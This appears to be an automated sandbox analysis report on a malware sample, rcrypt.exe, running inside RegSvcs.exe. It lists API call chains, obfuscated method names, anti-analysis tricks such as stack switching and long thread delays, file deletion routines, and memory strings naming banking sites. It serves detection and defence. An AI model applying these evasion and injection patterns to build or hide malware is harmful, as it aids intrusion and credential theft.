Code function: 0_2_0016C304 LoadLibraryA,GetProcAddress,

0_2_0016C304

Source: C:\Users\user\Desktop\rcrypt.exe	Code function: 0_2_00118B85 push ecx; ret	0_2_00118B98
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_0041C40C push cs; iretd	2_2_0041C4E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_00423149 push eax; ret	2_2_00423179
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_0041C50E push cs; iretd	2_2_0041C4E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_004231C8 push eax; ret	2_2_00423179
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_0040E21D push ecx; ret	2_2_0040E230
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_0041C6BE push ebx; ret	2_2_0041C6BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_02915361 pushfd ; ret	2_2_0291536B

Source: 2.2.RegSvcs.exe.2e60000.5.raw.unpack, WP6RZJql8gZrNhVA9v.cs	High entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'RRTxskPCmRQB2', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'
Source: 2.2.RegSvcs.exe.2a7a93e.1.raw.unpack, WP6RZJql8gZrNhVA9v.cs	High entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'RRTxskPCmRQB2', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'
Source: 2.2.RegSvcs.exe.2b60ee8.3.raw.unpack, WP6RZJql8gZrNhVA9v.cs	High entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'RRTxskPCmRQB2', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'

Source: C:\Users\user\Desktop\rcrypt.exe	Code function: 0_2_000F4A35 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,		0_2_000F4A35
Source: C:\Users\user\Desktop\rcrypt.exe	Code function: 0_2_001755FD IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,		0_2_001755FD

Source: C:\Users\user\Desktop\rcrypt.exe

Code function: 0_2_001133C7 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

0_2_001133C7

Source: C:\Users\user\Desktop\rcrypt.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Switches to a custom stack to bypass stack traces

Source: C:\Users\user\Desktop\rcrypt.exe

API/Special instruction interceptor: Address: 16F3214

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Code function: 2_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,FindCloseChangeNotification,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,

2_2_004019F0

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599890	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599781	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599671	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599562	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599453	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599343	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599234	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599124	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598995	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598887	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598781	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598671	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598562	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598452	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598343	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598234	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598125	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598015	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597906	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597797	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597685	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597576	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597468	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597359	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597250	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597140	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597031	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596922	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596812	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596703	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596593	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596470	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596343	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596234	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596125	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596015	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595903	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595796	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595687	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595578	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595468	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595359	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595249	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595140	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595031	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594921	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594812	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594703	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594593	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Window / User API: threadDelayed 7437			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Window / User API: threadDelayed 2423			Jump to behavior

Source: C:\Users\user\Desktop\rcrypt.exe

Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes

graph_0-99304

Source: C:\Users\user\Desktop\rcrypt.exe

API coverage: 4.8 %

Source: C:\Users\user\Desktop\rcrypt.exe	Code function: 0_2_00154696 GetFileAttributesW,FindFirstFileW,FindClose,	0_2_00154696
Source: C:\Users\user\Desktop\rcrypt.exe	Code function: 0_2_0015C93C FindFirstFileW,FindClose,	0_2_0015C93C
Source: C:\Users\user\Desktop\rcrypt.exe	Code function: 0_2_0015C9C7 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	0_2_0015C9C7
Source: C:\Users\user\Desktop\rcrypt.exe	Code function: 0_2_0015F200 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_0015F200
Source: C:\Users\user\Desktop\rcrypt.exe	Code function: 0_2_0015F35D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_0015F35D
Source: C:\Users\user\Desktop\rcrypt.exe	Code function: 0_2_0015F65E FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_0015F65E
Source: C:\Users\user\Desktop\rcrypt.exe	Code function: 0_2_00153A2B FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_00153A2B
Source: C:\Users\user\Desktop\rcrypt.exe	Code function: 0_2_00153D4E FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_00153D4E
Source: C:\Users\user\Desktop\rcrypt.exe	Code function: 0_2_0015BF27 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_0015BF27

Source: C:\Users\user\Desktop\rcrypt.exe

Code function: 0_2_000F4AFE GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_000F4AFE

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599890	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599781	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599671	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599562	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599453	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599343	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599234	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599124	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598995	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598887	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598781	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598671	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598562	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598452	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598343	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598234	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598125	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598015	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597906	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597797	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597685	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597576	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597468	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597359	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597250	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597140	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597031	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596922	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596812	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596703	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596593	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596470	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596343	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596234	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596125	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596015	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595903	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595796	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595687	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595578	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595468	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595359	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595249	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595140	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595031	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594921	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594812	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594703	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594593	Jump to behavior

Source: RegSvcs.exe, 00000002.00000002.3774685263.00000000042C6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20,11696497155j
Source: RegSvcs.exe, 00000002.00000002.3774685263.00000000042C6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11696497155
Source: RegSvcs.exe, 00000002.00000002.3774685263.00000000042C6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,11696497155t
Source: RegSvcs.exe, 00000002.00000002.3774685263.00000000042C6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696497155
Source: RegSvcs.exe, 00000002.00000002.3774685263.00000000042C6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - HKVMware20,11696497155]
Source: RegSvcs.exe, 00000002.00000002.3774685263.00000000042C6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware20,11696497155\|UE
